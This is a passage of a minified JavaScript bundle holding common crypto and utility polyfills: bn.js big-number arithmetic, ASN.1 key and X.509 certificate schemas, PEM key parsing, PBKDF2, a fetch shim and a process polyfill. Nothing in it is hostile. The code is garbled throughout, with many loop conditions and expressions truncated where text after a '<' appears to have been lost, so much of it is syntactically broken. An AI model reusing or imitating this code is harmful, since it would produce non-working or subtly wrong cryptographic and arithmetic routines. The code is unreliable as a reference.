Q(this.red&&!l.red,"redPow(normalNum)"),this.red._verify1(this),this.red.pow(this,l)};var O={k256:null,p224:null,p192:null,p25519:null};function B(z,l){this.name=z,this.p=new I(l,16),this.n=this.p.bitLength(),this.k=new I(1).iushln(this.n).isub(this.p),this.tmp=this._tmp()}function K(){B.call(this,"k256","ffffffff ffffffff ffffffff ffffffff ffffffff ffffffff fffffffe fffffc2f")}function ee(){B.call(this,"p224","ffffffff ffffffff ffffffff ffffffff 00000000 00000000 00000001")}function se(){B.call(this,"p192","ffffffff ffffffff ffffffff fffffffe ffffffff ffffffff")}function ve(){B.call(this,"25519","7fffffffffffffff ffffffffffffffff ffffffffffffffff ffffffffffffffed")}function le(z){if("string"==typeof z){var l=I._prime(z);this.m=l.p,this.prime=l}else Q(z.gtn(1),"modulus must be greater than 1"),this.m=z,this.prime=null}function ye(z){le.call(this,z),this.shift=this.m.bitLength(),this.shift%26!=0&&(this.shift+=26-this.shift%26),this.r=new I(1).iushln(this.shift),this.r2=this.imod(this.r.sqr()),this.rinv=this.r._invmp(this.m),this.minv=this.rinv.mul(this.r).isubn(1).div(this.m),this.minv=this.minv.umod(this.r),this.minv=this.r.sub(this.minv)}B.prototype._tmp=function(){var l=new I(null);return l.words=new Array(Math.ceil(this.n/13)),l},B.prototype.ireduce=function(l){var v,f=l;do{this.split(f,this.tmp),v=(f=(f=this.imulK(f)).iadd(this.tmp)).bitLength()}while(v>this.n);var M=v0?f.isub(this.p):void 0!==f.strip?f.strip():f._strip(),f},B.prototype.split=function(l,f){l.iushrn(this.n,0,f)},B.prototype.imulK=function(l){return l.imul(this.k)},ae(K,B),K.prototype.split=function(l,f){for(var v=4194303,M=Math.min(l.length,9),P=0;P>>22,G=X}l.words[P-10]=G>>>=22,l.length-=0===G&&l.length>10?10:9},K.prototype.imulK=function(l){l.words[l.length]=0,l.words[l.length+1]=0,l.length+=2;for(var f=0,v=0;v>>=26,l.words[v]=P,f=M}return 0!==f&&(l.words[l.length++]=f),l},I._prime=function(l){if(O[l])return O[l];var f;if("k256"===l)f=new K;else if("p224"===l)f=new ee;else if("p192"===l)f=new se;else{if("p25519"!==l)throw new Error("Unknown prime "+l);f=new ve}return O[l]=f,f},le.prototype._verify1=function(l){Q(0===l.negative,"red works only with positives"),Q(l.red,"red works only with red numbers")},le.prototype._verify2=function(l,f){Q(0==(l.negative|f.negative),"red works only with positives"),Q(l.red&&l.red===f.red,"red works only with red numbers")},le.prototype.imod=function(l){return this.prime?this.prime.ireduce(l)._forceRed(this):l.umod(this.m)._forceRed(this)},le.prototype.neg=function(l){return l.isZero()?l.clone():this.m.sub(l)._forceRed(this)},le.prototype.add=function(l,f){this._verify2(l,f);var v=l.add(f);return v.cmp(this.m)>=0&&v.isub(this.m),v._forceRed(this)},le.prototype.iadd=function(l,f){this._verify2(l,f);var v=l.iadd(f);return v.cmp(this.m)>=0&&v.isub(this.m),v},le.prototype.sub=function(l,f){this._verify2(l,f);var v=l.sub(f);return v.cmpn(0)<0&&v.iadd(this.m),v._forceRed(this)},le.prototype.isub=function(l,f){this._verify2(l,f);var v=l.isub(f);return v.cmpn(0)<0&&v.iadd(this.m),v},le.prototype.shl=function(l,f){return this._verify1(l),this.imod(l.ushln(f))},le.prototype.imul=function(l,f){return this._verify2(l,f),this.imod(l.imul(f))},le.prototype.mul=function(l,f){return this._verify2(l,f),this.imod(l.mul(f))},le.prototype.isqr=function(l){return this.imul(l,l.clone())},le.prototype.sqr=function(l){return this.mul(l,l)},le.prototype.sqrt=function(l){if(l.isZero())return l.clone();var f=this.m.andln(3);if(Q(f%2==1),3===f){var v=this.m.add(new I(1)).iushrn(2);return this.pow(l,v)}for(var M=this.m.subn(1),P=0;!M.isZero()&&0===M.andln(1);)P++,M.iushrn(1);Q(!M.isZero());var G=new I(1).toRed(this),X=G.redNeg(),L=this.m.subn(1).iushrn(1),h=this.m.bitLength();for(h=new I(2*h*h).toRed(this);0!==this.pow(h,L).cmp(X);)h.redIAdd(X);for(var R=this.pow(h,M),J=this.pow(l,M.addn(1).iushrn(1)),Z=this.pow(l,M),ue=P;0!==Z.cmp(G);){for(var Ie=Z,Ae=0;0!==Ie.cmp(G);Ae++)Ie=Ie.redSqr();Q(Ae=0;P--){for(var R=f.words[P],J=h-1;J>=0;J--){var Z=R>>J&1;G!==M[0]&&(G=this.sqr(G)),0!==Z||0!==X?(X<<=1,X|=Z,(4==++L||0===P&&0===J)&&(G=this.mul(G,M[X]),L=0,X=0)):L=0}h=26}return G},le.prototype.convertTo=function(l){var f=l.umod(this.m);return f===l?f.clone():f},le.prototype.convertFrom=function(l){var f=l.clone();return f.red=null,f},I.mont=function(l){return new ye(l)},ae(ye,le),ye.prototype.convertTo=function(l){return this.imod(l.ushln(this.shift))},ye.prototype.convertFrom=function(l){var f=this.imod(l.mul(this.rinv));return f.red=null,f},ye.prototype.imul=function(l,f){if(l.isZero()||f.isZero())return l.words[0]=0,l.length=1,l;var v=l.imul(f),M=v.maskn(this.shift).mul(this.minv).imaskn(this.shift).mul(this.m),P=v.isub(M).iushrn(this.shift),G=P;return P.cmp(this.m)>=0?G=P.isub(this.m):P.cmpn(0)<0&&(G=P.iadd(this.m)),G._forceRed(this)},ye.prototype.mul=function(l,f){if(l.isZero()||f.isZero())return new I(0)._forceRed(this);var v=l.mul(f),M=v.maskn(this.shift).mul(this.minv).imaskn(this.shift).mul(this.m),P=v.isub(M).iushrn(this.shift),G=P;return P.cmp(this.m)>=0?G=P.isub(this.m):P.cmpn(0)<0&&(G=P.iadd(this.m)),G._forceRed(this)},ye.prototype.invm=function(l){return this.imod(l._invmp(this.m).mul(this.r2))._forceRed(this)}}(Pe=de.nmd(Pe),this)},490:Pe=>{function we(de,ie){if(!de)throw new Error(ie||"Assertion failed")}Pe.exports=we,we.equal=function(ie,j,Q){if(ie!=j)throw new Error(Q||"Assertion failed: "+ie+" != "+j)}},4108:(Pe,we)=>{"use strict";var de=we;function j(ae){return 1===ae.length?"0"+ae:ae}function Q(ae){for(var I="",$=0;$>8,b=255&E;C?$.push(C,b):$.push(b)}return $},de.zero2=j,de.toHex=Q,de.encode=function(I,$){return"hex"===$?Q(I):I}},8225:(Pe,we)=>{"use strict";var ie=function(){if("undefined"!=typeof self)return self;if("undefined"!=typeof window)return window;if("undefined"!=typeof global)return global;throw new Error("unable to locate global object")}();Pe.exports=we=ie.fetch,ie.fetch&&(we.default=ie.fetch.bind(ie)),we.Headers=ie.Headers,we.Request=ie.Request,we.Response=ie.Response},9885:(Pe,we,de)=>{var ie=de(6854);function j(ae){var I=function(){return I.called?I.value:(I.called=!0,I.value=ae.apply(this,arguments))};return I.called=!1,I}function Q(ae){var I=function(){if(I.called)throw new Error(I.onceError);return I.called=!0,I.value=ae.apply(this,arguments)};return I.onceError=(ae.name||"Function wrapped with `once`")+" shouldn't be called more than once",I.called=!1,I}Pe.exports=ie(j),Pe.exports.strict=ie(Q),j.proto=j(function(){Object.defineProperty(Function.prototype,"once",{value:function(){return j(this)},configurable:!0}),Object.defineProperty(Function.prototype,"onceStrict",{value:function(){return Q(this)},configurable:!0})})},7934:(Pe,we,de)=>{"use strict";var ie=de(7758);we.certificate=de(3223);var j=ie.define("RSAPrivateKey",function(){this.seq().obj(this.key("version").int(),this.key("modulus").int(),this.key("publicExponent").int(),this.key("privateExponent").int(),this.key("prime1").int(),this.key("prime2").int(),this.key("exponent1").int(),this.key("exponent2").int(),this.key("coefficient").int())});we.RSAPrivateKey=j;var Q=ie.define("RSAPublicKey",function(){this.seq().obj(this.key("modulus").int(),this.key("publicExponent").int())});we.RSAPublicKey=Q;var ae=ie.define("SubjectPublicKeyInfo",function(){this.seq().obj(this.key("algorithm").use(I),this.key("subjectPublicKey").bitstr())});we.PublicKey=ae;var I=ie.define("AlgorithmIdentifier",function(){this.seq().obj(this.key("algorithm").objid(),this.key("none").null_().optional(),this.key("curve").objid().optional(),this.key("params").seq().obj(this.key("p").int(),this.key("q").int(),this.key("g").int()).optional())}),$=ie.define("PrivateKeyInfo",function(){this.seq().obj(this.key("version").int(),this.key("algorithm").use(I),this.key("subjectPrivateKey").octstr())});we.PrivateKey=$;var U=ie.define("EncryptedPrivateKeyInfo",function(){this.seq().obj(this.key("algorithm").seq().obj(this.key("id").objid(),this.key("decrypt").seq().obj(this.key("kde").seq().obj(this.key("id").objid(),this.key("kdeparams").seq().obj(this.key("salt").octstr(),this.key("iters").int())),this.key("cipher").seq().obj(this.key("algo").objid(),this.key("iv").octstr()))),this.key("subjectPrivateKey").octstr())});we.EncryptedPrivateKey=U;var E=ie.define("DSAPrivateKey",function(){this.seq().obj(this.key("version").int(),this.key("p").int(),this.key("q").int(),this.key("g").int(),this.key("pub_key").int(),this.key("priv_key").int())});we.DSAPrivateKey=E,we.DSAparam=ie.define("DSAparam",function(){this.int()});var C=ie.define("ECPrivateKey",function(){this.seq().obj(this.key("version").int(),this.key("privateKey").octstr(),this.key("parameters").optional().explicit(0).use(b),this.key("publicKey").optional().explicit(1).bitstr())});we.ECPrivateKey=C;var b=ie.define("ECParameters",function(){this.choice({namedCurve:this.objid()})});we.signature=ie.define("signature",function(){this.seq().obj(this.key("r").int(),this.key("s").int())})},3223:(Pe,we,de)=>{"use strict";var ie=de(7758),j=ie.define("Time",function(){this.choice({utcTime:this.utctime(),generalTime:this.gentime()})}),Q=ie.define("AttributeTypeValue",function(){this.seq().obj(this.key("type").objid(),this.key("value").any())}),ae=ie.define("AlgorithmIdentifier",function(){this.seq().obj(this.key("algorithm").objid(),this.key("parameters").optional(),this.key("curve").objid().optional())}),I=ie.define("SubjectPublicKeyInfo",function(){this.seq().obj(this.key("algorithm").use(ae),this.key("subjectPublicKey").bitstr())}),$=ie.define("RelativeDistinguishedName",function(){this.setof(Q)}),U=ie.define("RDNSequence",function(){this.seqof($)}),E=ie.define("Name",function(){this.choice({rdnSequence:this.use(U)})}),C=ie.define("Validity",function(){this.seq().obj(this.key("notBefore").use(j),this.key("notAfter").use(j))}),b=ie.define("Extension",function(){this.seq().obj(this.key("extnID").objid(),this.key("critical").bool().def(!1),this.key("extnValue").octstr())}),_=ie.define("TBSCertificate",function(){this.seq().obj(this.key("version").explicit(0).int().optional(),this.key("serialNumber").int(),this.key("signature").use(ae),this.key("issuer").use(E),this.key("validity").use(C),this.key("subject").use(E),this.key("subjectPublicKeyInfo").use(I),this.key("issuerUniqueID").implicit(1).bitstr().optional(),this.key("subjectUniqueID").implicit(2).bitstr().optional(),this.key("extensions").explicit(3).seqof(b).optional())}),y=ie.define("X509Certificate",function(){this.seq().obj(this.key("tbsCertificate").use(_),this.key("signatureAlgorithm").use(ae),this.key("signatureValue").bitstr())});Pe.exports=y},5104:(Pe,we,de)=>{var ie=/Proc-Type: 4,ENCRYPTED[\n\r]+DEK-Info: AES-((?:128)|(?:192)|(?:256))-CBC,([0-9A-H]+)[\n\r]+([0-9A-z\n\r+/=]+)[\n\r]+/m,j=/^-----BEGIN ((?:.*? KEY)|CERTIFICATE)-----/m,Q=/^-----BEGIN ((?:.*? KEY)|CERTIFICATE)-----([0-9A-z\n\r+/=]+)-----END \1-----$/m,ae=de(1851),I=de(8931),$=de(265).Buffer;Pe.exports=function(U,E){var _,C=U.toString(),b=C.match(ie);if(b){var A="aes"+b[1],p=$.from(b[2],"hex"),D=$.from(b[3].replace(/[\r\n]/g,""),"base64"),w=ae(E,p.slice(0,8),parseInt(b[1],10)).key,x=[],S=I.createDecipheriv(A,w,p);x.push(S.update(D)),x.push(S.final()),_=$.concat(x)}else{var y=C.match(Q);_=$.from(y[2].replace(/[\r\n]/g,""),"base64")}return{tag:C.match(j)[1],data:_}}},3262:(Pe,we,de)=>{var ie=de(7934),j=de(2562),Q=de(5104),ae=de(8931),I=de(8597),$=de(265).Buffer;function U(C){var b;"object"==typeof C&&!$.isBuffer(C)&&(b=C.passphrase,C=C.key),"string"==typeof C&&(C=$.from(C));var p,D,_=Q(C,b),y=_.tag,A=_.data;switch(y){case"CERTIFICATE":D=ie.certificate.decode(A,"der").tbsCertificate.subjectPublicKeyInfo;case"PUBLIC KEY":switch(D||(D=ie.PublicKey.decode(A,"der")),p=D.algorithm.algorithm.join(".")){case"1.2.840.113549.1.1.1":return ie.RSAPublicKey.decode(D.subjectPublicKey.data,"der");case"1.2.840.10045.2.1":return D.subjectPrivateKey=D.subjectPublicKey,{type:"ec",data:D};case"1.2.840.10040.4.1":return D.algorithm.params.pub_key=ie.DSAparam.decode(D.subjectPublicKey.data,"der"),{type:"dsa",data:D.algorithm.params};default:throw new Error("unknown key id "+p)}case"ENCRYPTED PRIVATE KEY":A=function E(C,b){var _=C.algorithm.decrypt.kde.kdeparams.salt,y=parseInt(C.algorithm.decrypt.kde.kdeparams.iters.toString(),10),A=j[C.algorithm.decrypt.cipher.algo.join(".")],p=C.algorithm.decrypt.cipher.iv,D=C.subjectPrivateKey,w=parseInt(A.split("-")[1],10)/8,x=I.pbkdf2Sync(b,_,y,w,"sha1"),S=ae.createDecipheriv(A,x,p),O=[];return O.push(S.update(D)),O.push(S.final()),$.concat(O)}(A=ie.EncryptedPrivateKey.decode(A,"der"),b);case"PRIVATE KEY":switch(p=(D=ie.PrivateKey.decode(A,"der")).algorithm.algorithm.join(".")){case"1.2.840.113549.1.1.1":return ie.RSAPrivateKey.decode(D.subjectPrivateKey,"der");case"1.2.840.10045.2.1":return{curve:D.algorithm.curve,privateKey:ie.ECPrivateKey.decode(D.subjectPrivateKey,"der").privateKey};case"1.2.840.10040.4.1":return D.algorithm.params.priv_key=ie.DSAparam.decode(D.subjectPrivateKey,"der"),{type:"dsa",params:D.algorithm.params};default:throw new Error("unknown key id "+p)}case"RSA PUBLIC KEY":return ie.RSAPublicKey.decode(A,"der");case"RSA PRIVATE KEY":return ie.RSAPrivateKey.decode(A,"der");case"DSA PRIVATE KEY":return{type:"dsa",params:ie.DSAPrivateKey.decode(A,"der")};case"EC PRIVATE KEY":return{curve:(A=ie.ECPrivateKey.decode(A,"der")).parameters.value,privateKey:A.privateKey};default:throw new Error("unknown key type "+y)}}Pe.exports=U,U.signature=ie.signature},8597:(Pe,we,de)=>{we.pbkdf2=de(8266),we.pbkdf2Sync=de(2)},8266:(Pe,we,de)=>{var $,_,ie=de(265).Buffer,j=de(9552),Q=de(5616),ae=de(2),I=de(4964),U=global.crypto&&global.crypto.subtle,E={sha:"SHA-1","sha-1":"SHA-1",sha1:"SHA-1",sha256:"SHA-256","sha-256":"SHA-256",sha384:"SHA-384","sha-384":"SHA-384","sha-512":"SHA-512",sha512:"SHA-512"},C=[];function y(){return _||(_=global.process&&global.process.nextTick?global.process.nextTick:global.queueMicrotask?global.queueMicrotask:global.setImmediate?global.setImmediate:global.setTimeout)}function A(D,w,x,S,O){return U.importKey("raw",D,{name:"PBKDF2"},!1,["deriveBits"]).then(function(B){return U.deriveBits({name:"PBKDF2",salt:w,iterations:x,hash:{name:O}},B,S<<3)}).then(function(B){return ie.from(B)})}Pe.exports=function(D,w,x,S,O,B){"function"==typeof O&&(B=O,O=void 0);var K=E[(O=O||"sha1").toLowerCase()];if(K&&"function"==typeof global.Promise){if(j(x,S),D=I(D,Q,"Password"),w=I(w,Q,"Salt"),"function"!=typeof B)throw new Error("No callback provided to pbkdf2");!function p(D,w){D.then(function(x){y()(function(){w(null,x)})},function(x){y()(function(){w(x)})})}(function b(D){if(global.process&&!global.process.browser||!U||!U.importKey||!U.deriveBits)return Promise.resolve(!1);if(void 0!==C[D])return C[D];var w=A($=$||ie.alloc(8),$,10,128,D).then(function(){return!0}).catch(function(){return!1});return C[D]=w,w}(K).then(function(ee){return ee?A(D,w,x,S,K):ae(D,w,x,S,O)}),B)}else y()(function(){var ee;try{ee=ae(D,w,x,S,O)}catch(se){return B(se)}B(null,ee)})}},5616:(Pe,we,de)=>{var j,ie=de(5486);j=global.process&&global.process.browser?"utf-8":global.process&&global.process.version?parseInt(ie.version.split(".")[0].slice(1),10)>=6?"utf-8":"binary":"utf-8",Pe.exports=j},9552:Pe=>{var we=Math.pow(2,30)-1;Pe.exports=function(de,ie){if("number"!=typeof de)throw new TypeError("Iterations not a number");if(de<0)throw new TypeError("Bad iterations");if("number"!=typeof ie)throw new TypeError("Key length not a number");if(ie<0||ie>we||ie!=ie)throw new TypeError("Bad key length")}},2:(Pe,we,de)=>{var ie=de(6853),j=de(1447),Q=de(6890),ae=de(265).Buffer,I=de(9552),$=de(5616),U=de(4964),E=ae.alloc(128),C={md5:16,sha1:20,sha224:28,sha256:32,sha384:48,sha512:64,rmd160:20,ripemd160:20};function b(A,p,D){var w=function _(A){return"rmd160"===A||"ripemd160"===A?function D(w){return(new j).update(w).digest()}:"md5"===A?ie:function p(w){return Q(A).update(w).digest()}}(A),x="sha512"===A||"sha384"===A?128:64;p.length>x?p=w(p):p.length{var ie=de(265).Buffer;Pe.exports=function(j,Q,ae){if(ie.isBuffer(j))return j;if("string"==typeof j)return ie.from(j,Q);if(ArrayBuffer.isView(j))return ie.from(j.buffer);throw new TypeError(ae+" must be a string, a Buffer, a typed array or a DataView")}},5486:Pe=>{var de,ie,we=Pe.exports={};function j(){throw new Error("setTimeout has not been defined")}function Q(){throw new Error("clearTimeout has not been defined")}function ae(p){if(de===setTimeout)return setTimeout(p,0);if((de===j||!de)&&setTimeout)return de=setTimeout,setTimeout(p,0);try{return de(p,0)}catch(D){try{return de.call(null,p,0)}catch(w){return de.call(this,p,0)}}}!function(){try{de="function"==typeof setTimeout?setTimeout:j}catch(p){de=j}try{ie="function"==typeof clearTimeout?clearTimeout:Q}catch(p){ie=Q}}();var E,$=[],U=!1,C=-1;function b(){!U||!E||(U=!1,E.length?$=E.concat($):C=-1,$.length&&_())}function _(){if(!U){var p=ae(b);U=!0;for(var D=$.length;D;){for(E=$,$=[];++C1)for(var w=1;w{we.publicEncrypt=de(1599),we.privateDecrypt=de(8064),we.privateEncrypt=function(j,Q){return we.publicEncrypt(j,Q,!0)},we.publicDecrypt=function(j,Q){return we.privateDecrypt(j,Q,!0)}},7489:(Pe,we,de)=>{var ie=de(2161),j=de(265).Buffer;function Q(ae){var I=j.allocUnsafe(4);return I.writeUInt32BE(ae,0),I}Pe.exports=function(ae,I){for(var E,$=j.alloc(0),U=0;$.length=65&&f<=70?f-55:f>=97&&f<=102?f-87:f-48&15}function E(z,l,f){var v=U(z,f);return f-1>=l&&(v|=U(z,f-1)<<4),v}function C(z,l,f,v){for(var M=0,P=Math.min(z.length,f),G=l;G=49?X-49+10:X>=17?X-17+10:X}return M}I.isBN=function(l){return l instanceof I||null!==l&&"object"==typeof l&&l.constructor.wordSize===I.wordSize&&Array.isArray(l.words)},I.max=function(l,f){return l.cmp(f)>0?l:f},I.min=function(l,f){return l.cmp(f)<0?l:f},I.prototype._init=function(l,f,v){if("number"==typeof l)return this._initNumber(l,f,v);if("object"==typeof l)return this._initArray(l,f,v);"hex"===f&&(f=16),Q(f===(0|f)&&f>=2&&f<=36);var M=0;"-"===(l=l.toString().replace(/\s+/g,""))[0]&&(M++,this.negative=1),M=0;M-=3)this.words[P]|=(G=l[M]|l[M-1]<<8|l[M-2]<<16)<>>26-X&67108863,(X+=24)>=26&&(X-=26,P++);else if("le"===v)for(M=0,P=0;M>>26-X&67108863,(X+=24)>=26&&(X-=26,P++);return this.strip()},I.prototype._parseHex=function(l,f,v){this.length=Math.ceil((l.length-f)/6),this.words=new Array(this.length);for(var M=0;M=f;M-=2)X=E(l,f,M)<=18?(P-=18,this.words[G+=1]|=X>>>26):P+=8;else for(M=(l.length-f)%2==0?f+1:f;M=18?(P-=18,this.words[G+=1]|=X>>>26):P+=8;this.strip()},I.prototype._parseBase=function(l,f,v){this.words=[0],this.length=1;for(var M=0,P=1;P<=67108863;P*=f)M++;M--,P=P/f|0;for(var G=l.length-v,X=G%M,L=Math.min(G,G-X)+v,h=0,R=v;R1&&0===this.words[this.length-1];)this.length--;return this._normSign()},I.prototype._normSign=function(){return 1===this.length&&0===this.words[0]&&(this.negative=0),this},I.prototype.inspect=function(){return(this.red?""};var b=["","0","00","000","0000","00000","000000","0000000","00000000","000000000","0000000000","00000000000","000000000000","0000000000000","00000000000000","000000000000000","0000000000000000","00000000000000000","000000000000000000","0000000000000000000","00000000000000000000","000000000000000000000","0000000000000000000000","00000000000000000000000","000000000000000000000000","0000000000000000000000000"],_=[0,0,25,16,12,11,10,9,8,8,7,7,7,7,6,6,6,6,6,6,6,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5],y=[0,0,33554432,43046721,16777216,48828125,60466176,40353607,16777216,43046721,1e7,19487171,35831808,62748517,7529536,11390625,16777216,24137569,34012224,47045881,64e6,4084101,5153632,6436343,7962624,9765625,11881376,14348907,17210368,20511149,243e5,28629151,33554432,39135393,45435424,52521875,60466176];function p(z,l,f){f.negative=l.negative^z.negative;var v=z.length+l.length|0;f.length=v,v=v-1|0;var M=0|z.words[0],P=0|l.words[0],G=M*P,L=G/67108864|0;f.words[0]=67108863&G;for(var h=1;h>>26,J=67108863&L,Z=Math.min(h,l.length-1),ue=Math.max(0,h-z.length+1);ue<=Z;ue++)R+=(G=(M=0|z.words[h-ue|0])*(P=0|l.words[ue])+J)/67108864|0,J=67108863&G;f.words[h]=0|J,L=0|R}return 0!==L?f.words[h]=0|L:f.length--,f.strip()}I.prototype.toString=function(l,f){var v;if(f=0|f||1,16===(l=l||10)||"hex"===l){v="";for(var M=0,P=0,G=0;G>>24-M&16777215)||G!==this.length-1?b[6-L.length]+L+v:L+v,(M+=2)>=26&&(M-=26,G--)}for(0!==P&&(v=P.toString(16)+v);v.length%f!=0;)v="0"+v;return 0!==this.negative&&(v="-"+v),v}if(l===(0|l)&&l>=2&&l<=36){var h=_[l],R=y[l];v="";var J=this.clone();for(J.negative=0;!J.isZero();){var Z=J.modn(R).toString(l);v=(J=J.idivn(R)).isZero()?Z+v:b[h-Z.length]+Z+v}for(this.isZero()&&(v="0"+v);v.length%f!=0;)v="0"+v;return 0!==this.negative&&(v="-"+v),v}Q(!1,"Base should be between 2 and 36")},I.prototype.toNumber=function(){var l=this.words[0];return 2===this.length?l+=67108864*this.words[1]:3===this.length&&1===this.words[2]?l+=4503599627370496+67108864*this.words[1]:this.length>2&&Q(!1,"Number can only safely store up to 53 bits"),0!==this.negative?-l:l},I.prototype.toJSON=function(){return this.toString(16)},I.prototype.toBuffer=function(l,f){return Q(void 0!==$),this.toArrayLike($,l,f)},I.prototype.toArray=function(l,f){return this.toArrayLike(Array,l,f)},I.prototype.toArrayLike=function(l,f,v){var M=this.byteLength(),P=v||Math.max(1,M);Q(M<=P,"byte array longer than desired length"),Q(P>0,"Requested array length <= 0"),this.strip();var L,h,G="le"===f,X=new l(P),R=this.clone();if(G){for(h=0;!R.isZero();h++)L=R.andln(255),R.iushrn(8),X[h]=L;for(;h=4096&&(v+=13,f>>>=13),f>=64&&(v+=7,f>>>=7),f>=8&&(v+=4,f>>>=4),f>=2&&(v+=2,f>>>=2),v+f},I.prototype._zeroBits=function(l){if(0===l)return 26;var f=l,v=0;return 0==(8191&f)&&(v+=13,f>>>=13),0==(127&f)&&(v+=7,f>>>=7),0==(15&f)&&(v+=4,f>>>=4),0==(3&f)&&(v+=2,f>>>=2),0==(1&f)&&v++,v},I.prototype.bitLength=function(){var f=this._countBits(this.words[this.length-1]);return 26*(this.length-1)+f},I.prototype.zeroBits=function(){if(this.isZero())return 0;for(var l=0,f=0;fl.length?this.clone().ior(l):l.clone().ior(this)},I.prototype.uor=function(l){return this.length>l.length?this.clone().iuor(l):l.clone().iuor(this)},I.prototype.iuand=function(l){var f;f=this.length>l.length?l:this;for(var v=0;vl.length?this.clone().iand(l):l.clone().iand(this)},I.prototype.uand=function(l){return this.length>l.length?this.clone().iuand(l):l.clone().iuand(this)},I.prototype.iuxor=function(l){var f,v;this.length>l.length?(f=this,v=l):(f=l,v=this);for(var M=0;Ml.length?this.clone().ixor(l):l.clone().ixor(this)},I.prototype.uxor=function(l){return this.length>l.length?this.clone().iuxor(l):l.clone().iuxor(this)},I.prototype.inotn=function(l){Q("number"==typeof l&&l>=0);var f=0|Math.ceil(l/26),v=l%26;this._expand(f),v>0&&f--;for(var M=0;M0&&(this.words[M]=~this.words[M]&67108863>>26-v),this.strip()},I.prototype.notn=function(l){return this.clone().inotn(l)},I.prototype.setn=function(l,f){Q("number"==typeof l&&l>=0);var v=l/26|0,M=l%26;return this._expand(v+1),this.words[v]=f?this.words[v]|1<l.length?(v=this,M=l):(v=l,M=this);for(var P=0,G=0;G>>26;for(;0!==P&&G>>26;if(this.length=v.length,0!==P)this.words[this.length]=P,this.length++;else if(v!==this)for(;Gl.length?this.clone().iadd(l):l.clone().iadd(this)},I.prototype.isub=function(l){if(0!==l.negative){l.negative=0;var f=this.iadd(l);return l.negative=1,f._normSign()}if(0!==this.negative)return this.negative=0,this.iadd(l),this.negative=1,this._normSign();var M,P,v=this.cmp(l);if(0===v)return this.negative=0,this.length=1,this.words[0]=0,this;v>0?(M=this,P=l):(M=l,P=this);for(var G=0,X=0;X>26,this.words[X]=67108863&f;for(;0!==G&&X>26,this.words[X]=67108863&f;if(0===G&&X>>13,Ie=0|M[1],Ae=8191&Ie,Ue=Ie>>>13,Xe=0|M[2],He=8191&Xe,Be=Xe>>>13,qe=0|M[3],De=8191&qe,Ve=qe>>>13,ze=0|M[4],me=8191&ze,Ke=ze>>>13,rt=0|M[5],Ge=8191&rt,Qe=rt>>>13,ht=0|M[6],mt=8191&ht,lt=ht>>>13,ft=0|M[7],xe=8191&ft,We=ft>>>13,Je=0|M[8],Oe=8191&Je,Te=Je>>>13,Le=0|M[9],$e=8191&Le,st=Le>>>13,xt=0|P[0],pt=8191&xt,vt=xt>>>13,Wi=0|P[1],Ft=8191&Wi,zt=Wi>>>13,pa=0|P[2],Jt=8191&pa,Gt=pa>>>13,Co=0|P[3],jt=8191&Co,qt=Co>>>13,Qn=0|P[4],Kt=8191&Qn,Zt=Qn>>>13,Bo=0|P[5],ti=8191&Bo,ii=Bo>>>13,pn=0|P[6],Pt=8191&pn,Xt=pn>>>13,Ho=0|P[7],Qt=8191&Ho,ei=Ho>>>13,$o=0|P[8],ai=8191&$o,$t=$o>>>13,zo=0|P[9],Ut=8191&zo,Yt=zo>>>13;v.negative=l.negative^f.negative,v.length=19;var ha=(X+(L=Math.imul(Z,pt))|0)+((8191&(h=(h=Math.imul(Z,vt))+Math.imul(ue,pt)|0))<<13)|0;X=((R=Math.imul(ue,vt))+(h>>>13)|0)+(ha>>>26)|0,ha&=67108863,L=Math.imul(Ae,pt),h=(h=Math.imul(Ae,vt))+Math.imul(Ue,pt)|0,R=Math.imul(Ue,vt);var Ha=(X+(L=L+Math.imul(Z,Ft)|0)|0)+((8191&(h=(h=h+Math.imul(Z,zt)|0)+Math.imul(ue,Ft)|0))<<13)|0;X=((R=R+Math.imul(ue,zt)|0)+(h>>>13)|0)+(Ha>>>26)|0,Ha&=67108863,L=Math.imul(He,pt),h=(h=Math.imul(He,vt))+Math.imul(Be,pt)|0,R=Math.imul(Be,vt),L=L+Math.imul(Ae,Ft)|0,h=(h=h+Math.imul(Ae,zt)|0)+Math.imul(Ue,Ft)|0,R=R+Math.imul(Ue,zt)|0;var Va=(X+(L=L+Math.imul(Z,Jt)|0)|0)+((8191&(h=(h=h+Math.imul(Z,Gt)|0)+Math.imul(ue,Jt)|0))<<13)|0;X=((R=R+Math.imul(ue,Gt)|0)+(h>>>13)|0)+(Va>>>26)|0,Va&=67108863,L=Math.imul(De,pt),h=(h=Math.imul(De,vt))+Math.imul(Ve,pt)|0,R=Math.imul(Ve,vt),L=L+Math.imul(He,Ft)|0,h=(h=h+Math.imul(He,zt)|0)+Math.imul(Be,Ft)|0,R=R+Math.imul(Be,zt)|0,L=L+Math.imul(Ae,Jt)|0,h=(h=h+Math.imul(Ae,Gt)|0)+Math.imul(Ue,Jt)|0,R=R+Math.imul(Ue,Gt)|0;var co=(X+(L=L+Math.imul(Z,jt)|0)|0)+((8191&(h=(h=h+Math.imul(Z,qt)|0)+Math.imul(ue,jt)|0))<<13)|0;X=((R=R+Math.imul(ue,qt)|0)+(h>>>13)|0)+(co>>>26)|0,co&=67108863,L=Math.imul(me,pt),h=(h=Math.imul(me,vt))+Math.imul(Ke,pt)|0,R=Math.imul(Ke,vt),L=L+Math.imul(De,Ft)|0,h=(h=h+Math.imul(De,zt)|0)+Math.imul(Ve,Ft)|0,R=R+Math.imul(Ve,zt)|0,L=L+Math.imul(He,Jt)|0,h=(h=h+Math.imul(He,Gt)|0)+Math.imul(Be,Jt)|0,R=R+Math.imul(Be,Gt)|0,L=L+Math.imul(Ae,jt)|0,h=(h=h+Math.imul(Ae,qt)|0)+Math.imul(Ue,jt)|0,R=R+Math.imul(Ue,qt)|0;var 